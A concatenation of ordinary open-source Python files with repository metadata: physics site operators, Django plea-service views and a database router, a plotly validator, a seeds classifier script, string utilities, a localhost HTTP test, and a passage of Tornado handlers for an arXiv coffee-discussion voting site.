c[0, 1] = 1
c_dag[1, 0] = 1
n[1, 1] = 1
# add the states
self.add_state("empty")
self.add_state("occupied")
# for clarity
state_empty = self.states["empty"]
state_occupied = self.states["occupied"]
# set the list elements different from zero to the right values
state_empty[0] = 1.0
state_occupied[1] = 1.0
class SpinOneHalfSite(Site):
"""A site for spin 1/2 models.
Use this class for spin one-half sites. The Hilbert space is ordered
such as the first state is the spin down, and the second state is the
spin up.
Notes
-----
Postcondition : The site has already built-in the spin operators for
s_x, s_y, s_z, s_p, s_m.
"""
def __init__(self):
"""Creates the spin one-half site.
Notes
-----
Postcond : the dimension is set to 2
"""
super(SpinOneHalfSite, self).__init__(2)
# add the operators
self.add_operator("s_x")
self.add_operator("s_y")
self.add_operator("s_z")
self.add_operator("s_p")
self.add_operator("s_m")
# for clarity
s_x = self.operators["s_x"]
s_y = self.operators["s_y"]
s_y = s_y.astype(np.complex)
s_z = self.operators["s_z"]
s_p = self.operators["s_p"]
s_m = self.operators["s_m"]
# set the matrix elements different from zero to the right values
s_x[0, 1] = 0.5
s_x[1, 0] = 0.5
s_y[0, 1] = 1j*(-0.5)
s_y[1, 0] = 1j*0.5
s_z[0, 0] = -0.5
s_z[1, 1] = 0.5
s_p[1, 0] = 1.0
s_m[0, 1] = 1.0
# add the states
self.add_state("spin_up")
self.add_state("spin_down")
self.add_state("empty")
self.add_state("occupied")
# for clarity
state_up = self.states["spin_up"]
state_down = self.states["spin_down"]
state_empty = self.states["empty"]
state_occupied = self.states["occupied"]
# set the list elements different from zero to the right values
state_up[1] = 1.0
state_down[0] = 1.0
state_occupied[1] = 1.0
state_empty[0] = 1.0
class ElectronicSite(Site):
"""A site for electronic models
You use this site for models where the single sites are electron
sites. The Hilbert space is ordered such as:
- the first state, labelled 0, is the empty site,
- the second, labelled 1, is spin down,
- the third, labelled 2, is spin up, and
- the fourth, labelled 3, is double occupancy.
Notes
-----
Postcond: The site has already built-in the spin operators for:
- c_up : destroys an spin up electron,
- c_up_dag, creates an spin up electron,
- c_down, destroys an spin down electron,
- c_down_dag, creates an spin down electron,
- s_z, component z of spin,
- s_p, raises the component z of spin,
- s_m, lowers the component z of spin,
- n_up, number of electrons with spin up,
- n_down, number of electrons with spin down,
- n, number of electrons, i.e. n_up+n_down, and
- u, number of double occupancies, i.e. n_up*n_down.
"""
def __init__(self):
super(ElectronicSite, self).__init__(4)
# add the operators
self.add_operator("c_up")
self.add_operator("c_up_dag")
self.add_operator("c_down")
self.add_operator("c_down_dag")
self.add_operator("s_z")
self.add_operator("n_up")
self.add_operator("n_down")
self.add_operator("n")
self.add_operator("u")
# for clarity
c_up = self.operators["c_up"]
c_up_dag = self.operators["c_up_dag"]
c_down = self.operators["c_down"]
c_down_dag = self.operators["c_down_dag"]
s_z = self.operators["s_z"]
n_up = self.operators["n_up"]
n_down = self.operators["n_down"]
n = self.operators["n"]
u = self.operators["u"]
# set the matrix elements different from zero to the right values
c_up[0,2] = 1.0
c_up[1,3] = 1.0
c_up_dag[2,0] = 1.0
c_up_dag[3,1] = 1.0
c_down[0,1] = 1.0
c_down[2,3] = 1.0
c_down_dag[1,0] = 1.0
c_down_dag[3,2] = 1.0
s_z[1,1] = -1.0
s_z[2,2] = 1.0
n_up[2,2] = 1.0
n_up[3,3] = 1.0
n_down[1,1] = 1.0
n_down[3,3] = 1.0
n[1,1] = 1.0
n[2,2] = 1.0
n[3,3] = 2.0
u[3,3] = 1.0
# add the states
self.add_state("empty")
self.add_state("spin_down")
self.add_state("spin_up")
self.add_state("double")
# for clarity
state_empty = self.states["empty"]
state_down = self.states["spin_down"]
state_up = self.states["spin_up"]
state_double = self.states["double"]
# set the list elements different from zero to the right values
state_empty[0] = 1.0
state_down[1] = 1.0
state_up[2] = 1.0
state_double[3] = 1.0
| fhqgfss/MoHa | moha/modelsystem/sites.py | Python | mit | 7,169 |
import datetime
import json
from brake.decorators import ratelimit
from django.utils.decorators import method_decorator
from django.utils.translation import get_language
from django.conf import settings
from django.core.urlresolvers import reverse_lazy
from django.http import HttpResponseRedirect, HttpResponse
from django.shortcuts import redirect
from django.views.generic import FormView
from django.template import RequestContext
import logging
logger = logging.getLogger(__name__)
from django.contrib.admin.views.decorators import staff_member_required
from apps.forms.stages import MultiStageForm
from apps.forms.views import StorageView
from make_a_plea.helpers import (
filter_cases_by_month,
get_supported_language_from_request,
parse_date_or_400,
staff_or_404,
)
from .models import Case, Court, CaseTracker
from .forms import CourtFinderForm
from .stages import (URNEntryStage,
AuthenticationStage,
NoticeTypeStage,
CaseStage,
YourDetailsStage,
CompanyDetailsStage,
PleaStage,
YourStatusStage,
YourEmploymentStage,
YourSelfEmploymentStage,
YourOutOfWorkBenefitsStage,
AboutYourIncomeStage,
YourBenefitsStage,
YourPensionCreditStage,
YourIncomeStage,
HardshipStage,
HouseholdExpensesStage,
OtherExpensesStage,
CompanyFinancesStage,
ReviewStage,
CompleteStage)
from .fields import ERROR_MESSAGES
class PleaOnlineForms(MultiStageForm):
url_name = "plea_form_step"
stage_classes = [URNEntryStage,
AuthenticationStage,
NoticeTypeStage,
CaseStage,
YourDetailsStage,
CompanyDetailsStage,
PleaStage,
YourStatusStage,
YourEmploymentStage,
YourSelfEmploymentStage,
YourOutOfWorkBenefitsStage,
AboutYourIncomeStage,
YourBenefitsStage,
YourPensionCreditStage,
YourIncomeStage,
HardshipStage,
HouseholdExpensesStage,
OtherExpensesStage,
CompanyFinancesStage,
ReviewStage,
CompleteStage]
def __init__(self, *args, **kwargs):
super(PleaOnlineForms, self).__init__(*args, **kwargs)
self._urn_invalid = False
def save(self, *args, **kwargs):
"""
Check that the URN has not already been used.
"""
saved_urn = self.all_data.get("case", {}).get("urn")
saved_first_name = self.all_data.get("your_details", {}).get("first_name")
saved_last_name = self.all_data.get("your_details", {}).get("last_name")
if all([
saved_urn,
saved_first_name,
saved_last_name,
not Case.objects.can_use_urn(saved_urn, saved_first_name, saved_last_name)
]):
self._urn_invalid = True
else:
return super(PleaOnlineForms, self).save(*args, **kwargs)
def render(self, request, request_context=None):
request_context = request_context if request_context else {}
if self._urn_invalid:
return redirect("urn_already_used")
return super(PleaOnlineForms, self).render(request)
class PleaOnlineViews(StorageView):
start = "enter_urn"
def __init__(self, *args, **kwargs):
super(PleaOnlineViews, self).__init__(*args, **kwargs)
self.index = None
self.storage = None
def dispatch(self, request, *args, **kwargs):
# If the session has timed out, redirect to start page
if all([
not request.session.get("plea_data"),
kwargs.get("stage", self.start) != self.start,
]):
return HttpResponseRedirect("/")
# Store the index if we've got one
idx = kwargs.pop("index", None)
try:
self.index = int(idx)
except (ValueError, TypeError):
self.index = 0
# Load storage
self.storage = self.get_storage(request, "plea_data")
return super(PleaOnlineViews, self).dispatch(request, *args, **kwargs)
def get(self, request, stage=None):
if not stage:
stage = PleaOnlineForms.stage_classes[0].name
return HttpResponseRedirect(reverse_lazy("plea_form_step", args=(stage,)))
form = PleaOnlineForms(self.storage, stage, self.index)
case_redirect = form.load(RequestContext(request))
if case_redirect:
return case_redirect
form.process_messages(request)
if stage == "complete":
self.clear_storage(request, "plea_data")
return form.render(request)
@method_decorator(ratelimit(block=True, rate=settings.RATE_LIMIT))
def post(self, request, stage):
nxt = request.GET.get("next", None)
form = PleaOnlineForms(self.storage, stage, self.index)
form.save(request.POST, RequestContext(request), nxt)
if not form._urn_invalid:
form.process_messages(request)
request.session.modified = True
return form.render(request)
def render(self, request, request_context=None):
request_context = request_context if request_context else {}
return super(PleaOnlineViews, self).render(request)
class UrnAlreadyUsedView(StorageView):
template_name = "urn_used.html"
def post(self, request):
del request.session["plea_data"]
return redirect("plea_form_step", stage="case")
class CourtFinderView(FormView):
template_name = "court_finder.html"
form_class = CourtFinderForm
def form_valid(self, form):
try:
court = Court.objects.get_court_dx(form.cleaned_data["urn"])
except Court.DoesNotExist:
court = False
return self.render_to_response(
self.get_context_data(
form=form,
court=court,
submitted=True,
)
)
@staff_or_404
def stats(request):
"""
Generate usage statistics (optionally by language) and send via email
"""
filter_params = {
"sent": True,
"language": get_supported_language_from_request(request),
}
if "end_date" in request.GET:
end_date = parse_date_or_400(request.GET["end_date"])
else:
now = datetime.datetime.utcnow()
last_day_of_last_month = now - datetime.timedelta(days=now.day)
end_date = datetime.datetime(
last_day_of_last_month.year,
last_day_of_last_month.month,
last_day_of_last_month.day,
23, 59, 59)
filter_params["completed_on__lte"] = end_date
if "start_date" in request.GET:
start_date = parse_date_or_400(request.GET["start_date"])
else:
start_date = datetime.datetime(1970, 1, 1)
filter_params["completed_on__gte"] = start_date
journies = Case.objects.filter(**filter_params).order_by("completed_on")
count = journies.count()
journies_by_month = filter_cases_by_month(journies)
earliest_journey = journies[0] if journies else None
latest_journey = journies.reverse()[0] if journies else None
response = {
"summary": {
"language": filter_params["language"],
"total": count,
"start_date": start_date.isoformat(),
"end_date": end_date.isoformat(),
"earliest_journey": earliest_journey.completed_on.isoformat() if earliest_journey else None,
"latest_journey": latest_journey.completed_on.isoformat() if latest_journey else None,
"by_month": journies_by_month,
},
"latest_example": {
"urn": latest_journey.urn,
"name": latest_journey.name,
"extra_data": {
k: v
for k, v in latest_journey.extra_data.items()
if k in [
"Forename1",
"Forename2",
"Surname",
"DOB",
]
},
}
} if count else {}
return HttpResponse(
json.dumps(response, indent=4),
content_type="application/json",
)
| ministryofjustice/manchester_traffic_offences_pleas | apps/plea/views.py | Python | mit | 8,700 |
class DatabaseRouter(object):
'''
These functions are called when Django accesses the database.
Returns the name of the database to use depending on the app and model.
Returning None means use default.
'''
def db_for_read(self, model, **hints):
return self.__db_for_read_and_write(model, **hints)
def db_for_write(self, model, **hints):
return self.__db_for_read_and_write(model, **hints)
def allow_relation(self, obj1, obj2, **hints):
return None
def allow_syncdb(self, db, model):
'''
Makes sure the correct databases are used when "python manage.py syncdb" is called.
Returning True means "model" should be synchronised with "db".
'''
allow = False
if db == 'default':
allow = model._meta.app_label != 'OGRgeoConverter'
allow = allow and model._meta.app_label != 'sessions'
elif db == 'sessions_db':
allow = model._meta.app_label == 'sessions'
elif db == 'ogrgeoconverter_db':
allow = model._meta.db_table != 'ogrgeoconverter_log_entries'
allow = allow and model._meta.db_table != 'ogrgeoconverter_ogr_log_entries'
allow = allow and model._meta.db_table != 'ogrgeoconverter_conversion_jobs'
allow = allow and model._meta.db_table != 'ogrgeoconverter_conversion_job_folders'
allow = allow and model._meta.db_table != 'ogrgeoconverter_conversion_job_file_matches'
allow = allow and model._meta.db_table != 'ogrgeoconverter_conversion_job_files'
allow = allow and model._meta.db_table != 'ogrgeoconverter_conversion_job_file_id_tracking'
allow = allow and model._meta.db_table != 'ogrgeoconverter_conversion_job_urls'
allow = allow and model._meta.db_table != 'ogrgeoconverter_conversion_job_shell_parameters'
allow = allow and model._meta.db_table != 'ogrgeoconverter_conversion_job_download_items'
allow = allow and model._meta.db_table != 'ogrgeoconverter_conversion_job_identification'
allow = allow and model._meta.app_label == 'OGRgeoConverter'
elif db == 'ogrgeoconverter_conversion_jobs_db':
allow = model._meta.db_table == 'ogrgeoconverter_conversion_jobs'
allow = allow or model._meta.db_table == 'ogrgeoconverter_conversion_job_folders'
allow = allow or model._meta.db_table == 'ogrgeoconverter_conversion_job_file_matches'
allow = allow or model._meta.db_table == 'ogrgeoconverter_conversion_job_files'
allow = allow or model._meta.db_table == 'ogrgeoconverter_conversion_job_file_id_tracking'
allow = allow or model._meta.db_table == 'ogrgeoconverter_conversion_job_urls'
allow = allow or model._meta.db_table == 'ogrgeoconverter_conversion_job_shell_parameters'
allow = allow or model._meta.db_table == 'ogrgeoconverter_conversion_job_download_items'
allow = allow or model._meta.db_table == 'ogrgeoconverter_conversion_job_identification'
allow = allow and model._meta.app_label == 'OGRgeoConverter'
elif db == 'ogrgeoconverter_log_db':
allow = model._meta.db_table == 'ogrgeoconverter_log_entries'
allow = allow or model._meta.db_table == 'ogrgeoconverter_ogr_log_entries'
allow = allow and model._meta.app_label == 'OGRgeoConverter'
else:
allow = None
return allow
def __db_for_read_and_write(self, model, **hints):
if model._meta.app_label == 'sessions':
return 'sessions_db'
elif model._meta.app_label == 'OGRgeoConverter':
if model._meta.db_table == 'ogrgeoconverter_log_entries' \
or model._meta.db_table == 'ogrgeoconverter_ogr_log_entries':
return 'ogrgeoconverter_log_db'
elif model._meta.db_table == 'ogrgeoconverter_conversion_jobs' \
or model._meta.db_table == 'ogrgeoconverter_conversion_job_folders' \
or model._meta.db_table == 'ogrgeoconverter_conversion_job_file_matches' \
or model._meta.db_table == 'ogrgeoconverter_conversion_job_files' \
or model._meta.db_table == 'ogrgeoconverter_conversion_job_file_id_tracking' \
or model._meta.db_table == 'ogrgeoconverter_conversion_job_urls' \
or model._meta.db_table == 'ogrgeoconverter_conversion_job_shell_parameters' \
or model._meta.db_table == 'ogrgeoconverter_conversion_job_download_items' \
or model._meta.db_table == 'ogrgeoconverter_conversion_job_identification':
return 'ogrgeoconverter_conversion_jobs_db'
else:
return 'ogrgeoconverter_db'
return None
| geometalab/geoconverter | GeoConverter/database.py | Python | mit | 4,858 |
SIMPLE_SETTINGS = {
'OVERRIDE_BY_ENV': True
}
MY_VAR = u'Some Value'
| drgarcia1986/simple-settings | tests/samples/special.py | Python | mit | 74 |
import _plotly_utils.basevalidators
class SizeValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self,
plotly_name="size",
parent_name="histogram.marker.colorbar.tickfont",
**kwargs
):
super(SizeValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "colorbars"),
min=kwargs.pop("min", 1),
role=kwargs.pop("role", "style"),
**kwargs
)
| plotly/python-api | packages/python/plotly/plotly/validators/histogram/marker/colorbar/tickfont/_size.py | Python | mit | 541 |
# This code is supporting material for the book
# Building Machine Learning Systems with Python
# by Willi Richert and Luis Pedro Coelho
# published by PACKT Publishing
#
# It is made available under the MIT License
from load import load_dataset
import numpy as np
from threshold import learn_model, apply_model, accuracy
features, labels = load_dataset('seeds')
# Turn the labels into a binary array
labels = (labels == 'Canadian')
error = 0.0
for fold in range(10):
training = np.ones(len(features), bool)
# numpy magic to make an array with 10% of 0s starting at fold
training[fold::10] = 0
# whatever is not training is for testing
testing = ~training
model = learn_model(features[training], labels[training])
test_error = accuracy(features[testing], labels[testing], model)
error += test_error
error /= 10.0
print('Ten fold cross-validated error was {0:.1%}.'.format(error))
| krahman/BuildingMachineLearningSystemsWithPython | ch02/seeds_threshold.py | Python | mit | 921 |
# -*- coding: utf8 -*-
import re
from unidecode import unidecode
import os, sys
from hashlib import md5 as hasher
import binascii
import settings
def gen_flattened_list(iterables):
for item in iterables:
if hasattr(item, '__iter__'):
for i in item:
yield i
else:
yield item
def crc32(val):
return binascii.crc32(val) & 0xffffffff
# brennan added this
def wrap(text, width):
"""
A word-wrap function that preserves existing line breaks
and most spaces in the text. Expects that existing line
breaks are posix newlines (\n).
"""
return reduce(lambda line, word, width=width: '%s%s%s' %
(line,
' \n'[(len(line)-line.rfind('\n')-1
+ len(word.split('\n',1)[0]
) >= width)],
word),
text.split(' ')
)
_punct_re = re.compile(r'[\t !"#$%&\'()*\-/<=>?@\[\\\]^_`{|},.;:]+')
htmlCodes = (
('&', '&'),
('<', '<'),
('>', '>'),
('"', '"'),
(''', "'"),
)
def escape_html(s):
for bad, good in htmlCodes:
s = s.replace(bad, good)
return s
def slugify(text, delim='', lowercase=True):
"""ex: slugify(u'Шамиль Абетуллаев','')
returns u'shamilabetullaev'"""
text = escape_html(text)
result = []
if lowercase:
text=text.lower()
for word in _punct_re.split(text):
decoded = _punct_re.split(unidecode(word))
result.extend(decoded)
result = unicode(delim.join(result))
return result.lower() if lowercase else result
def salted_hash(val):
hash = hasher(settings.CRYPTO_SECRET)
hash.update(unicode(val, 'utf-8') if isinstance(val, str) else unicode(val))
return hash.hexdigest()
| jumoconnect/openjumo | jumodjango/etc/func.py | Python | mit | 1,840 |
#!/usr/bin/python
import urllib2
url = "http://localhost:8888/test/test.txt"
html = urllib2.urlopen(url).read()
print html
send_headers = {
'range':'bytes=10-'
}
req = urllib2.Request(url, headers=send_headers)
html = urllib2.urlopen(req).read()
print html
| misilences/incipe | var/www/test/crawler/rbt.py | Python | mit | 266 |
N = int(input())
B = [int(x) for x in input().split()]
A = [10**5] * N
for i, b in enumerate(B):
A[i] = min(A[i], b)
A[i+1] = min(A[i+1], b)
print(sum(A))
| knuu/competitive-programming | atcoder/abc/abc140_c.py | Python | mit | 163 |
#!/usr/bin/env python
'''coffeehandlers.py - Waqas Bhatti ([email protected]) - Jul 2014
This contains the URL handlers for the astroph-coffee web-server.
'''
import os.path
import logging
import base64
import re
LOGGER = logging.getLogger(__name__)
from datetime import datetime, timedelta
from pytz import utc, timezone
import tornado.web
from tornado.escape import xhtml_escape, xhtml_unescape, url_unescape, squeeze
import arxivdb
import webdb
import fulltextsearch as fts
import ipaddress
######################
## USEFUL CONSTANTS ##
######################
ARCHIVEDATE_REGEX = re.compile(r'^(\d{4})(\d{2})(\d{2})$')
MONTH_NAMES = {x:datetime(year=2014,month=x,day=12)
for x in range(1,13)}
######################
## USEFUL FUNCTIONS ##
######################
def msgencode(message, signer):
'''This escapes a message, then base64 encodes it.
Uses an itsdangerous.Signer instance provided as the signer arg to sign the
message to protect against tampering.
'''
try:
msg = base64.b64encode(signer.sign(xhtml_escape(message)))
msg = msg.replace('=','*')
return msg
except Exception as e:
return ''
def msgdecode(message, signer):
'''This base64 decodes a message, then unescapes it.
Uses an itsdangerous.Signer instance provided as the signer arg to verify
the message to protect against tampering.
'''
try:
msg = message.replace('*','=')
decoded_message = base64.b64decode(msg)
decoded_message = signer.unsign(decoded_message)
return xhtml_unescape(decoded_message)
except Exception as e:
return ''
def group_arxiv_dates(dates, npapers, nlocal, nvoted):
'''
This takes a list of datetime.dates and the number of papers corresponding
to each date and builds a nice dict out of it, allowing the following
listing (in rev-chron order) to be made:
YEAR X
Month X:
Date X --- <strong>YY<strong> papers
.
.
.
YEAR 1
Month 1:
Date 1 --- <strong>YY<strong> papers
'''
years, months = [], []
for x in dates:
years.append(x.year)
months.append(x.month)
unique_years = set(years)
unique_months = set(months)
yeardict = {}
for year in unique_years:
yeardict[year] = {}
for month in unique_months:
yeardict[year][MONTH_NAMES[month]] = [
(x,y,z,w) for (x,y,z,w) in zip(dates, npapers, nlocal, nvoted)
if (x.year == year and x.month == month)
]
for month in yeardict[year].copy():
if not yeardict[year][month]:
del yeardict[year][month]
return yeardict
##################
## URL HANDLERS ##
##################
class CoffeeHandler(tornado.web.RequestHandler):
'''
This handles all requests for /astroph-coffee and redirects based on
time of day.
'''
def initialize(self,
database,
voting_start,
voting_end,
coffee_time,
server_tz,
signer,
room,
building,
department,
institution):
'''
Sets up the database.
'''
self.database = database
self.voting_start = voting_start
self.voting_end = voting_end
self.coffee_time = coffee_time
self.local_tz = timezone(server_tz)
self.signer = signer
self.room = room
self.building = building
self.department = department
self.institution = institution
def get(self):
'''
This handles GET requests.
'''
# handle a redirect with an attached flash message
flash_message = self.get_argument('f', None)
if flash_message:
flashtext = msgdecode(flash_message, self.signer)
LOGGER.warning('flash message: %s' % flashtext)
flashbox = (
'<div data-alert class="alert-box radius">%s'
' <a class="close">×</a></div>' %
flashtext
)
flash_message = flashbox
else:
flash_message = ''
# first, get the session token
session_token = self.get_secure_cookie('coffee_session',
max_age_days=30)
ip_address = self.request.remote_ip
if 'User-Agent' in self.request.headers:
client_header = self.request.headers['User-Agent'] or 'none'
else:
client_header = 'none'
local_today = datetime.now(tz=utc).strftime('%Y-%m-%d %H:%M %Z')
user_name = 'anonuser@%s' % ip_address
new_user = True
# check if we're in voting time-limits
timenow = datetime.now(tz=utc).timetz()
# check if this session_token corresponds to an existing user
if session_token:
sessioninfo = webdb.session_check(session_token,
database=self.database)
if sessioninfo[0]:
user_name = sessioninfo[2]
LOGGER.info('found session for %s, continuing with it' %
user_name)
new_user = False
elif sessioninfo[-1] != 'database_error':
LOGGER.warning('unknown user, starting a new session for '
'%s, %s' % (ip_address, client_header))
sessionok, token = webdb.anon_session_initiate(
ip_address,
client_header,
database=self.database
)
if sessionok and token:
self.set_secure_cookie('coffee_session',
token,
httponly=True)
else:
LOGGER.error('could not set session cookie for %s, %s' %
(ip_address, client_header))
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
local_today=local_today,
error_message=message,
flash_message=flash_message,
new_user=new_user)
else:
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
local_today=local_today,
error_message=message,
flash_message=flash_message,
new_user=new_user)
# there's no existing user session
else:
if ('crawler' not in client_header.lower() and
'bot' not in client_header.lower()):
LOGGER.warning('unknown user, starting a new session for '
'%s, %s' % (ip_address, client_header))
sessionok, token = webdb.anon_session_initiate(
ip_address,
client_header,
database=self.database
)
if sessionok and token:
self.set_secure_cookie('coffee_session',
token,
httponly=True)
else:
LOGGER.error('could not set session cookie for %s, %s' %
(ip_address, client_header))
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
local_today=local_today,
error_message=message,
flash_message=flash_message,
new_user=new_user)
# construct the current dt and use it to figure out the local-to-server
# voting times
dtnow = datetime.now(tz=utc)
dtstart = dtnow.replace(hour=self.voting_start.hour,
minute=self.voting_start.minute,
second=0)
local_start = dtstart.astimezone(self.local_tz)
local_start = local_start.strftime('%H:%M %Z')
dtend = dtnow.replace(hour=self.voting_end.hour,
minute=self.voting_end.minute,
second=0)
local_end = dtend.astimezone(self.local_tz)
local_end = local_end.strftime('%H:%M %Z')
dtcoffee = dtnow.replace(hour=self.coffee_time.hour,
minute=self.coffee_time.minute,
second=0)
local_coffee = dtcoffee.astimezone(self.local_tz)
local_coffee = local_coffee.strftime('%H:%M %Z')
utc_start = self.voting_start.strftime('%H:%M %Z')
utc_end = self.voting_end.strftime('%H:%M %Z')
utc_coffee = self.coffee_time.strftime('%H:%M %Z')
self.render("index.html",
user_name=user_name,
local_today=local_today,
voting_localstart=local_start,
voting_localend=local_end,
voting_start=utc_start,
voting_end=utc_end,
coffeetime_local=local_coffee,
coffeetime_utc=utc_coffee,
flash_message=flash_message,
new_user=new_user,
coffee_room=self.room,
coffee_building=self.building,
coffee_department=self.department,
coffee_institution=self.institution)
class ArticleListHandler(tornado.web.RequestHandler):
'''This handles all requests for the listing of selected articles and voting
pages. Note: if nobody voted on anything, the default is to return all
articles with local authors at the top.
'''
def initialize(self, database,
voting_start,
voting_end,
server_tz,
reserve_interval,
signer):
'''
Sets up the database.
'''
self.database = database
self.voting_start = voting_start
self.voting_end = voting_end
self.server_tz = server_tz
self.signer = signer
self.reserve_interval = reserve_interval
def get(self):
'''
This handles GET requests.
'''
# handle a redirect with an attached flash message
flash_message = self.get_argument('f', None)
if flash_message:
flashtext = msgdecode(flash_message, self.signer)
LOGGER.warning('flash message: %s' % flashtext)
flashbox = (
'<div data-alert class="alert-box radius">%s'
'<a href="#" class="close">×</a></div>' %
flashtext
)
flash_message = flashbox
else:
flash_message = ''
# first, get the session token
session_token = self.get_secure_cookie('coffee_session',
max_age_days=30)
ip_address = self.request.remote_ip
if 'User-Agent' in self.request.headers:
client_header = self.request.headers['User-Agent'] or 'none'
else:
client_header = 'none'
local_today = datetime.now(tz=utc).strftime('%Y-%m-%d %H:%M %Z')
todays_date = datetime.now(tz=utc).strftime('%A, %b %d %Y')
todays_utcdate = datetime.now(tz=utc).strftime('%Y-%m-%d')
todays_localdate = (
datetime.now(tz=timezone(self.server_tz)).strftime('%Y-%m-%d')
)
todays_utcdow = datetime.now(tz=utc).weekday()
todays_localdate_str = (
datetime.now(tz=timezone(self.server_tz)).strftime('%A, %b %d %Y')
)
user_name = 'anonuser@%s' % ip_address
new_user = True
# check if this session_token corresponds to an existing user
if session_token:
sessioninfo = webdb.session_check(session_token,
database=self.database)
if sessioninfo[0]:
user_name = sessioninfo[2]
LOGGER.info('found session for %s, continuing with it' %
user_name)
new_user = False
elif sessioninfo[-1] != 'database_error':
LOGGER.warning('unknown user, starting a new session for '
'%s, %s' % (ip_address, client_header))
sessionok, token = webdb.anon_session_initiate(
ip_address,
client_header,
database=self.database
)
if sessionok and token:
self.set_secure_cookie('coffee_session',
token,
httponly=True)
else:
LOGGER.error('could not set session cookie for %s, %s' %
(ip_address, client_header))
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
local_today=local_today,
error_message=message,
flash_message=flash_message,
new_user=new_user)
else:
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
local_today=local_today,
error_message=message,
flash_message=flash_message,
new_user=new_user)
# there's no existing user session
else:
if ('crawler' not in client_header.lower() and
'bot' not in client_header.lower()):
LOGGER.warning('unknown user, starting a new session for '
'%s, %s' % (ip_address, client_header))
sessionok, token = webdb.anon_session_initiate(
ip_address,
client_header,
database=self.database
)
if sessionok and token:
self.set_secure_cookie('coffee_session',
token,
httponly=True)
else:
LOGGER.error('could not set session cookie for %s, %s' %
(ip_address, client_header))
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
local_today=local_today,
error_message=message,
flash_message=flash_message,
new_user=new_user)
############################
## SERVE THE PAGE REQUEST ##
############################
# check if we're in voting time-limits
timenow = datetime.now(tz=utc).timetz()
# if we are within the time limits, then show the voting page
if (self.voting_start < timenow < self.voting_end):
# get the articles for today
(local_articles, voted_articles,
other_articles, reserved_articles) = (
arxivdb.get_articles_for_voting(database=self.database)
)
# if today's papers aren't ready yet, redirect to the papers display
if not local_articles and not voted_articles and not other_articles:
LOGGER.warning('no papers for today yet, '
'redirecting to previous day papers')
(latestdate, local_articles,
voted_articles, other_articles, reserved_articles) = (
arxivdb.get_articles_for_listing(
database=self.database
)
)
todays_date = datetime.strptime(
latestdate,
'%Y-%m-%d'
).strftime('%A, %b %d %Y')
# don't show a message on the weekend when no papers are loaded
if todays_utcdow in (5,6):
flash_message = ""
else:
flash_message = (
"<div data-alert class=\"alert-box radius\">"
"Papers for today haven't been imported yet. "
"Here are the most recent papers. "
"Please wait a few minutes and try again."
"<a href=\"#\" class=\"close\">×</a></div>"
)
# preprocess the local papers to highlight local author names
if len(local_articles) > 0:
for lind in range(len(local_articles)):
author_list = local_articles[lind][4]
author_list = author_list.split(': ')[-1].split(',')
local_indices = local_articles[lind][-2]
if local_indices and len(local_indices) > 0:
local_indices = [
int(x) for x in local_indices.split(',')
]
for li in local_indices:
author_list[li] = '<strong>%s</strong>' % (
author_list[li]
)
# update this article's local authors
local_articles[lind][4] = ', '.join(author_list)
# show the listing page
self.render("listing.html",
user_name=user_name,
local_today=local_today,
todays_date=todays_date,
local_articles=local_articles,
voted_articles=voted_articles,
other_articles=other_articles,
reserved_articles=reserved_articles,
flash_message=flash_message,
reserve_interval_days=self.reserve_interval,
new_user=new_user)
# if today's papers are ready, show them and ask for votes
else:
# get this user's votes
user_articles = arxivdb.get_user_votes(todays_utcdate,
user_name,
database=self.database)
user_reserved = arxivdb.get_user_reservations(
todays_utcdate,
user_name,
database=self.database
)
LOGGER.info('user has votes on: %s, has reservations on: %s'
% (user_articles, user_reserved))
# preprocess the local papers to highlight local author names
if len(local_articles) > 0:
for lind in range(len(local_articles)):
author_list = local_articles[lind][4]
author_list = author_list.split(': ')[-1].split(',')
local_indices = local_articles[lind][-2]
if local_indices and len(local_indices) > 0:
local_indices = [
int(x) for x in local_indices.split(',')
]
for li in local_indices:
author_list[li] = '<strong>%s</strong>' % (
author_list[li]
)
# update this article's local authors
local_articles[lind][4] = ', '.join(author_list)
# show the voting page
self.render("voting.html",
user_name=user_name,
local_today=local_today,
todays_date=todays_date,
local_articles=local_articles,
voted_articles=voted_articles,
other_articles=other_articles,
reserved_articles=reserved_articles,
flash_message=flash_message,
new_user=new_user,
reserve_interval_days=self.reserve_interval,
user_articles=user_articles,
user_reserved=user_reserved)
# otherwise, show the article list
else:
# get the articles for today
(latestdate, local_articles,
voted_articles, other_articles, reserved_articles) = (
arxivdb.get_articles_for_listing(utcdate=todays_utcdate,
database=self.database)
)
# if today's papers aren't ready yet, show latest papers
if not local_articles and not voted_articles and not other_articles:
(latestdate, local_articles,
voted_articles, other_articles, reserved_articles) = (
arxivdb.get_articles_for_listing(
database=self.database
)
)
todays_date = datetime.strptime(
latestdate,
'%Y-%m-%d'
).strftime('%A, %b %d %Y')
# don't show a message on the weekend when no papers are loaded
if todays_utcdow in (5,6):
flash_message = ""
else:
flash_message = (
"<div data-alert class=\"alert-box radius\">"
"Papers for today haven't been imported yet. "
"Here are the most recent papers. "
"Please wait a few minutes and try again."
"<a href=\"#\" class=\"close\">×</a></div>"
)
# preprocess the local papers to highlight local author names
if len(local_articles) > 0:
for lind in range(len(local_articles)):
author_list = local_articles[lind][4]
author_list = author_list.split(': ')[-1].split(',')
local_indices = local_articles[lind][-2]
if local_indices and len(local_indices) > 0:
local_indices = [
int(x) for x in local_indices.split(',')
]
for li in local_indices:
author_list[li] = '<strong>%s</strong>' % (
author_list[li]
)
# update this article's local authors
local_articles[lind][4] = ', '.join(author_list)
# show the listing page
self.render("listing.html",
